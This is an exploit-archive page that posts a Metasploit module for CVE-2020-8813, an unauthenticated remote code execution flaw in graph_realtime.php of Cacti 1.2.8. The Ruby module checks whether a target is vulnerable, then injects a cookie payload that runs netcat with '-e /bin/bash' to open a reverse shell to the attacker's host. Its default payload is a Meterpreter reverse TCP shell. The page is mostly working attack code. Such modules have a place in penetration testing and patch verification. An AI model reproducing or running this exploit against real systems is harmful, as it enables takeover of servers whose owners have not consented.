Cacti 1.2.8 Unauthenticated Remote Code Execution

Cacti 1.2.8 Unauthenticated Remote Code Execution: Posted Mar 2, 2020; Authored by Lucas Amorim | Site metasploit.com; graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie if a guest user has the graph real-time privilege.; tags | exploit, remote, arbitrary, shell, php; advisories | CVE-2020-8813; SHA-256 | ddfd448fc925b28a03aaba73be8f9999625bb6879802ec1b4e35f2eeef4e1d87; Download | Favorite | View

Cacti 1.2.8 Unauthenticated Remote Code Execution

# Exploit Title: Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)
# Date: 2020-02-29
# Exploit Author: Lucas Amorim (sh286)s
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: Linux
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Cacti v1.2.8 Unauthenticated Remote Code Execution',
      'Description' => %q{graph_realtime.php in Cacti 1.2.8 allows remote attackers to 
        execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has 
        the graph real-time privilege.},
      'Author' =>
        [
          'Lucas Amorim ' # MSF module
        ],
      'License' => MSF_LICENSE,
      'Platform' => 'php',
      'References' =>
        [
          ['CVE', '2020-8813']
        ],
      'DisclosureDate' => 'Feb 21 2020',
      'Privileged' => true,
      'DefaultOptions' => {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp',
        'SSL' => true,
      },
      'Targets' => [
        ['Automatic', {}]
      ],
      'DefaultTarget'   => 0))

      register_options(
        [
          Opt::RPORT(443),
          OptString.new('RPATH', [ false, "path to cacti", "" ])
        ])

        deregister_options('VHOST')
  end

  def check
    res = send_request_raw(
      'method' => 'GET',
      'uri' => "#{datastore['RPATH']}/graph_realtime.php?action=init"
    )

    if res && res.code == 200
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def send_payload()
    exec_payload=(";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % [datastore['LHOST'], datastore['LPORT']])
    send_request_raw(
      'uri' => "#{datastore['RPATH']}/graph_realtime.php?action=init",
      'method' => 'GET',
      'cookie' => "Cacti=#{Rex::Text.uri_encode(exec_payload, mode = 'hex-normal')}"
    )
  end

  def exploit
    if check == Exploit::CheckCode::Vulnerable
      print_good("Target seems to be a vulnerable")
      send_payload()
    else
      print_error("Target does not seem to be vulnerable. Will exit now...")
    end
  end
end

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

Cacti 1.2.8 Unauthenticated Remote Code Execution

Cacti 1.2.8 Unauthenticated Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Cacti 1.2.8 Unauthenticated Remote Code Execution

Share This

Cacti 1.2.8 Unauthenticated Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems